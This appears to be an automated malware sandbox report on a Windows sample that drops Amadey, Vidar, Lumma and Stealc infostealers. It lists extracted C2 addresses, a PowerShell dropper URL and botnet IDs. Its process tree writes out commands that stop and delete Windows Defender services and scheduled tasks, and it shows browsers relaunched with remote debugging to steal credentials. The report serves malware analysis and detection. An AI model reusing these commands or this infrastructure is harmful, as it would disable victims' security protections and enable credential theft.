Analysis
-
max time kernel
34s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
29/03/2025, 13:25
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
0b7487b0b78bd7587e0583b13b068f02
-
SHA1
c55a13d7b730ba5e51511979d11b04d11acf53ab
-
SHA256
dad41fe11699ffd7e23d5bf0c558966cf6156626752e4a517d0c955cbb7b5b60
-
SHA512
db7e99356df898fa3176326bcd9198fa138939bcf84a1881de99ea2915aa108703d50ddfb60c11fdfb5660ab88c42b49607b4db9eb829171a9d7deddc5a3edf8
-
SSDEEP
49152:1U0Hx5st812q2hKXqY84SW6fi5jSJY8xxN0hX:20HxINni5jSnv
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://176.113.115.7/mine/random.exe
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://176.113.115.7/mine/random.exe
Extracted
Family
amadey
Version
5.21
Botnet
092155
C2
http://176.113.115.6
Attributes
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
rc4.plain
Extracted
Family
vidar
Version
13.3
Botnet
11373d37b176b52c098f600f61cdf190
C2
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
Attributes
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
Family
lumma
C2
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://apixtreev.run/LkaUz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://cosmosyf.top/GOsznj
https://esccapewz.run/ANSbwqy
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://triplooqp.world/APowko
https://mtriplooqp.world/APowko
https://wxayfarer.live/ALosnz
https://70oreheatq.live/gsopp
https://0castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
Extracted
Family
vidar
Version
13.3
Botnet
928af183c2a2807a3c0526e8c0c9369d
C2
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
Attributes
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
Family
stealc
Botnet
trump
C2
http://45.93.20.28
Attributes
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Detect Vidar Stealer 41 IoCs
-
Detects Healer an antivirus disabler dropper 3 IoCs
-
Healer
Healer an antivirus disabler dropper.
-
Healer family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to execute payload.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 7 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 42 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 11 IoCs
-
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Modifies file permissions 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 4 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Kills process with taskkill 5 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry key 1 TTPs 7 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 17 IoCs
-
Suspicious use of FindShellTrayWindow 31 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\76B6.tmp\76B7.tmp\76B8.bat C:\Users\Admin\AppData\Local\Temp\22.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\77B0.tmp\77B1.tmp\77B2.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdfd88dcf8,0x7ffdfd88dd04,0x7ffdfd88dd106⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1968 /prefetch:26⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1564,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:36⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2520 /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3232 /prefetch:16⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3472 /prefetch:16⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4288 /prefetch:26⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4664 /prefetch:16⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5208,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4784 /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5280,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5236 /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5312,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5552 /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5344,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5212,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5824 /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5972,i,16738581068265698844,6034647499869518395,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5984 /prefetch:86⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffdfd86f208,0x7ffdfd86f214,0x7ffdfd86f2206⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=2772 /prefetch:36⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2744,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=2740 /prefetch:26⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1260,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3524,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:16⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:16⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4108,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=4620 /prefetch:16⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4120,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=4624 /prefetch:26⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4124,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=3708 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5224,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=5232 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5520,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=5376 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,12384666406136096051,1259998138394578386,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:86⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\iwlf3" & exit5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 116⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
-
